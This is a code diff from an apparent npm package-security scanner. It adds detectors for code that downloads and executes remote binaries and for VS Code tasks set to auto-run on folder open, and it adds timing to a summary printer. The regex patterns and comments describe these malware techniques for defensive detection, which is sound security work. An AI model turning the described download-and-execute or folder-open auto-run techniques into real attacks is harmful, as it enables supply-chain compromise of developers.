+      /downloadToFile[\s\S]{0,2000}exec(?:File)?(?:Sync)?\s*\(/,
+      /createWriteStream[\s\S]{0,2000}exec(?:File)?(?:Sync)?\s*\(/,
+    ];
+
+    const runtimeMatches = runtimePatterns.filter(p => p.test(code));
+    const execMatches = execPatterns.filter(p => p.test(code));
+    const downloadExecMatches = downloadExecPatterns.filter(p => p.test(code));
+
+    if (runtimeMatches.length === 0 && downloadExecMatches.length === 0) return null;
+
+    const details = [];
+
+    if (runtimeMatches.length > 0) {
+      details.push(`external runtime reference (${runtimeMatches.length} pattern(s))`);
+    }
+    if (execMatches.length > 0) {
+      details.push(`executes downloaded binary (${execMatches.length} pattern(s))`);
+    }
+    if (downloadExecMatches.length > 0) {
+      details.push('downloads and executes remote binary');
+    }
+
+    // High score: downloading a runtime to execute code is a major evasion technique
+    let score = 9;
+    if (runtimeMatches.length > 0 && (execMatches.length > 0 || downloadExecMatches.length > 0)) {
+      score = 50;
+    } else if (downloadExecMatches.length > 0) {
+      score = 30;
+    }
+
+    return { name: this.name, score, detail: details.join('; ') };
+  }
+}
+
+module.exports = new RuntimeDownloadMarshaller();

package/src/marshallers/vscodeTasks.js

@@ -0,0 +1,29 @@
+'use strict';
+
+const { Marshaller } = require('./base');
+
+class VscodeTasksMarshaller extends Marshaller {
+  constructor() {
+    super('vscode-autorun', 'VS Code tasks with automatic execution');
+  }
+
+  check(code) {
+    // Detect tasks.json content with runOn: folderOpen (auto-executes on project open)
+    if (!code.includes('runOn') && !code.includes('folderOpen')) return null;
+
+    const hasFolderOpen = /["']runOn["']\s*:\s*["']folderOpen["']/.test(code);
+    if (!hasFolderOpen) return null;
+
+    // Extract the command being auto-run
+    const commandMatch = code.match(/["']command["']\s*:\s*["']([^"']+)["']/);
+    const command = commandMatch ? commandMatch[1] : 'unknown';
+
+    return {
+      name: this.name,
+      score: 30,
+      detail: `VS Code task auto-executes on folder open: "${command}"`,
+    };
+  }
+}
+
+module.exports = new VscodeTasksMarshaller();

package/src/utils/output.js

@@ -90,15 +90,16 @@ function printPackageResult(pkg, result) {
   }
 }
 
-function printSummary(results) {
+function printSummary(results, elapsedMs) {
   const blocked = results.filter(r => r.verdict === 'BLOCK').length;
   const warned  = results.filter(r => r.verdict === 'WARN').length;
   const total   = results.totalPackages || results.length;
   const ok      = total - blocked - warned;
+  const timing  = elapsedMs != null ? dim(`  (${elapsedMs}ms)`) : '';
 
   log('');
   log(dim('─'.repeat(60)));
-  log(`  ${green(String(ok))} clean   ${yellow(String(warned))} warnings   ${red(String(blocked))} blocked`);
+  log(`  ${green(String(ok))} clean   ${yellow(String(warned))} warnings   ${red(String(blocked))} blocked${timing}`);
   log('');
 }